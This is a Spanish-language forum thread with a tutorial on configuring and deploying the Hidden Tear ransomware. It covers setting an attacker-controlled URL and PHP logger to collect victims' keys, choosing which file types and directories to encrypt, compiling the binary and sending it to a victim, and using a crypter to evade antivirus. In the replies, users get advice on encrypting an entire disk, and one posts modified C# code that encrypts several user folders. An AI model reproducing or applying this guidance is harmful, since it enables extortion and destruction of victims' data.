(http://www.isightpartners.com/wp-content/uploads/2014/08/ransomware.gif)
Sigo con las publicaciones sobre este ransomware de código abierto, si no has leído las anteriores, te recomiendo que lo hagas:
Configurando Hidden Tear Offline (https://underc0de.org/foro/malware/configurando-hidden-tear-(offline)/)
Información sobre Hidden Tear (https://underc0de.org/foro/malware/hidden-tear-el-primer-ransomware-open-source/)
Para comenzar a configurar este malware, debemos descargar su código source, podemos hacerlo desde su repositorio oficial en github: https://github.com/utkusen/hidden-tear
Mirror: https://mega.nz/#!qMMhlaCS!7J5W9rdeUJDkWxpH5CI4nzWIb6XWrJlY0eskA2q1znQ
Para poder modificarlo y compilarlo, necesitaremos Visual Studio. Abriremos el proyecto que hay en el directorio "hidden-tear", no tendremos problemas para entenderlo y modificar las cosas que queramos, pues el código está perfectamente comentado y muy bien estructurado.
Lo primero que vemos, es a que url enviará el ransomware la información del ordenador y la contraseña, para ello, debemos poner nuestra url y tener el archivo php que se encargue de recibir los datos correctamente creado y con los permisos adecuados.
(http://2.bp.blogspot.com/-_FB7pmrifNY/VigB14TXg8I/AAAAAAAAAlE/hj1VGyIrha4/s1600/2.png)
(http://2.bp.blogspot.com/-KtML-RlrMA4/VigB1GiI7VI/AAAAAAAAAko/XqzCO-4zKdQ/s320/1_a.png)
(http://3.bp.blogspot.com/-tJBW8gUQ0vI/VigB1YxjQsI/AAAAAAAAAk0/mZI-QBkmGlM/s320/1_b.png)
Ambos ficheros deberán tener permisos de escritura.
En ese paso, podremos modificar la contraseña que queremos que cree aleatoriamente, aunque se puede modificar para dejarla fija.
(http://4.bp.blogspot.com/-5H-BFrwhpZ8/VigB2NlEacI/AAAAAAAAAl0/LdlMWzTlADU/s640/3.png)
Aquí podremos elegir que se envía a nuestro fichero php y por tanto se guarda en los logs.
(http://3.bp.blogspot.com/-HFNz28g_580/VigB23Hx-GI/AAAAAAAAAlw/WPOn7-C8am0/s1600/4.png)
El método de cifrado de ficheros y la extensión que se utilizará.
(http://1.bp.blogspot.com/-fijxsX8fahs/VigB3AhX7MI/AAAAAAAAAlg/-0cXBwNASlE/s1600/5.png)
Extensiones que se encriptarán, podemos suprimir alguna o bien, añadir más.
(http://2.bp.blogspot.com/-z3xmTXm1aMk/VigB3t-vFsI/AAAAAAAAAlY/Ol-_kng5qzQ/s1600/6.png)
En que directorio se guardará el txt con el mensaje que queremos dejar y empezará a ejecutar el ransomware, es muy importante que exista el directorio o dará un error cuando la víctima lo ejecute. Además, tener en cuenta de que si empieza en el Escritorio, no afectará a directorios superiores, para afectar a todo el disco habrá que ejecutarlo en la raiz de C:\ o bien el directorio que nosotros queramos.
(http://1.bp.blogspot.com/-4Zg1q_1FsHA/VigB4A38FzI/AAAAAAAAAlU/AeEMTlqUTbs/s1600/7.png)
Compilamos y se lo enviamos a la víctima.
Por desgracia, Hidden-Tear ya no es fud (Fully UnDetectable).
(http://1.bp.blogspot.com/-21nZ6pmcunM/VigB4D2M51I/AAAAAAAAAlc/3EvsGQTAnI8/s400/8.png)
Como cualquier malware, se puede pasar por un crypter para evitar que sea detectado.
(http://3.bp.blogspot.com/-fQ2uP6Ca8HI/VigBzlGDVoI/AAAAAAAAAkY/tt7Ys3va3p4/s400/10.png)
(http://1.bp.blogspot.com/-mdKmHSnydDo/VigBxWpQV5I/AAAAAAAAAkE/pNOYlZyHd9A/s400/11.png)
Ejecutamos Hidden Tear y comprobamos que nuestros ficheros se han cifrado con la extensión
.locked(http://4.bp.blogspot.com/-nYjSEH9CJuI/VigBzhxErkI/AAAAAAAAAkk/yFlDA2RDPNU/s400/12.png)
Vamos a nuestro fichero de logs y conseguimos la contraseña para recuperar nuestros ficheros.
(http://1.bp.blogspot.com/-pKYdfBMvHmo/VigByHErPlI/AAAAAAAAAkI/1sKypyQyYm4/s320/13.png)
Utilizando otro proyecto llamado hidden-tear-decrypter (también en github), podremos recuperar los ficheros, utilizando esta contraseña.
Nota: Si alguien le editó la extensión
.locked, deberá modificar esta línea escribiendo la extensión que utilizó.
(http://4.bp.blogspot.com/-sM8Lke66rlg/VhpTHJOuJdI/AAAAAAAAAhE/4FHnsJu1EtY/s400/11.png)
(http://3.bp.blogspot.com/-jN06wa6SQf8/VigBzwLVOzI/AAAAAAAAAl4/yFip_MRjieU/s400/14.png)
Y tenemos nuestros ficheros de nuevo!
(http://4.bp.blogspot.com/-N21LyByhYeo/VigB2ODSmTI/AAAAAAAAAls/9rfOdUDvivE/s320/15.png)
Ver en el blog: http://blog.underc0de.org/2015/10/configurando-hidden-tear-online.html
Saludos!
Ta muy bueno ese jodido Hidden Tear, a parte de que es PHP uffff a ver si le echamos un bueno ojo (y no el de atrás)... y de paso si podemos generar el run ese para otras plataformas :3 Salutones :D
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal ??? o es que no eh leí bien la configuración :'(
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal ??? o es que no eh leí bien la configuración :'(
Seguramente no esté bien configurado el path de donde empieza a ejecutar.
Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...
(http://1.bp.blogspot.com/-4Zg1q_1FsHA/VigB4A38FzI/AAAAAAAAAlU/AeEMTlqUTbs/s1600/7.png)
Saludos :D
How Can we affect all C Path ? Thus; What can we edit in code to affect all C path in the below code:
public void startAction()
{
string password = CreatePassword(15);
string path = "\\Desktop\\"; <<<<<<<<<<<<--------------(what do we put in here ? to affect entire C disk Encrypt ?)
string startPath = userDir + userName + path;
SendPassword(password);
encryptDirectory(startPath,password);
messageCreator();
password = null;
System.Windows.Forms.Application.Exit();
}
@simdia (https://underc0de.org/foro/index.php?action=profile;u=52055) the brother @blackdrake (https://underc0de.org/foro/index.php?action=profile;u=24972) responses your question in the post above
Change this string path = "\\Desktop\\" by string path = "\\" only with double backslash and the program starts changing all harddisk 's extensions
Great post brother blackdrake i didn't see before maybe i'll do in java because it has similar sintax.
Holaa esta bien el programita los ficheros datos.txt y test.php llevan el mismo codigo php dentro? o es que subes test.php con ese codigo y luego cuando la persona abre el ransom se crea automaticamante datos.txt? y luego entraria en datos.txt para ver el pass ? no entendi porque dices que datos.txt y test.php tienen q estar configurados y con permisos pero no muestras si el archivo datos.txt lleva el mismo codigo por eso me salio esta duda. si es que se crea automaticamente o como es. gracias por la posible respuestas. un abrazo y creo que cosas asi son las que me han llevado a estar pegado a este foro. Gracias por los grandes aportes que haces
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Holaa esta bien el programita los ficheros datos.txt y test.php llevan el mismo codigo php dentro? o es que subes test.php con ese codigo y luego cuando la persona abre el ransom se crea automaticamante datos.txt? y luego entraria en datos.txt para ver el pass ? no entendi porque dices que datos.txt y test.php tienen q estar configurados y con permisos pero no muestras si el archivo datos.txt lleva el mismo codigo por eso me salio esta duda. si es que se crea automaticamente o como es. gracias por la posible respuestas. un abrazo y creo que cosas asi son las que me han llevado a estar pegado a este foro. Gracias por los grandes aportes que haces
Test.php tiene el código que muestro, datos.txt estará vacio hasta que se ejecute y guarde algún dato.
Saludos.
Gracias muy buena, eres un crack! saludos
Tuviste que modificar alguna cosa mas? solo cambie la pagina web compilo y no se ejecuta . el ejecutable que viene ya si se ejecuta pero si lo compilo sin hacer cambios en el codigo no se ejecuta tampoco. la extension aunque sea .locked tambien hay que cambiar la linea que pusiste por .locked o solo si es por otra cosa? no entiendo mucho porque sin hacer cambios ninguno y volverlo a compilar no funciona , y el ejecutable original es el unico que funciona. quizas falta algun cambio por ahi y el ejecutable ese lo haya puesto desps. un royo que me monte yo solo seguro
Pues si, funciona haciendo esos pequeños cambios. pero hay que hacerloss si no, no sirve.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal ??? o es que no eh leí bien la configuración :'(
Seguramente no esté bien configurado el path de donde empieza a ejecutar.
Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...
(http://1.bp.blogspot.com/-4Zg1q_1FsHA/VigB4A38FzI/AAAAAAAAAlU/AeEMTlqUTbs/s1600/7.png)
Saludos :D
Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal ??? o es que no eh leí bien la configuración :'(
Seguramente no esté bien configurado el path de donde empieza a ejecutar.
Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...
(http://1.bp.blogspot.com/-4Zg1q_1FsHA/VigB4A38FzI/AAAAAAAAAlU/AeEMTlqUTbs/s1600/7.png)
Saludos :D
Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.
Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.
Ya nos cuentas.
Un saludo.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal ??? o es que no eh leí bien la configuración :'(
Seguramente no esté bien configurado el path de donde empieza a ejecutar.
Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...
(http://1.bp.blogspot.com/-4Zg1q_1FsHA/VigB4A38FzI/AAAAAAAAAlU/AeEMTlqUTbs/s1600/7.png)
Saludos :D
Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.
Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.
Ya nos cuentas.
Un saludo.
Prueba a filtrar esa excepcion con un if
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal ??? o es que no eh leí bien la configuración :'(
Seguramente no esté bien configurado el path de donde empieza a ejecutar.
Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...
(http://1.bp.blogspot.com/-4Zg1q_1FsHA/VigB4A38FzI/AAAAAAAAAlU/AeEMTlqUTbs/s1600/7.png)
Saludos :D
Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.
Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.
Ya nos cuentas.
Un saludo.
Hola, gracias por responder, termine haciendo esto:
public void startAction()
{
string passwordPath = userDir + userName + pcPassword;
string password = File.ReadAllText(passwordPath);
string path = "\\Documents";
string path2 = "\\Desktop";
string path3 = "\\Pictures";
string path5 = "\\Downloads";
string path6 = "\\Music";
string path7 = "\\Videos";
string startPath = userDir + userName + path;
string startPath2 = userDir + userName + path2;
string startPath3 = userDir + userName + path3;
string startPath5 = userDir + userName + path5;
string startPath6 = userDir + userName + path6;
string startPath7 = userDir + userName + path7;
encryptDirectory(startPath, password);
encryptDirectory(startPath2, password);
encryptDirectory(startPath3, password);
encryptDirectory(startPath5, password);
encryptDirectory(startPath6, password);
encryptDirectory(startPath7, password);
messageCreator();
password = null;
File.WriteAllText(passwordPath, String.Empty);
File.Delete(passwordPath);
System.Windows.Forms.Application.Exit();
}
hola, muchas gracias por tu aporte.
sabes hay algo que no entiendo, es sobre php.
me podrias explicar mejor esa parte, si no es mucha la molestia.
no entiendo lo de la configuración para recibir los datos, se hacen en el servidor? se crea un php en servidor?
de antemano muchas gracias!!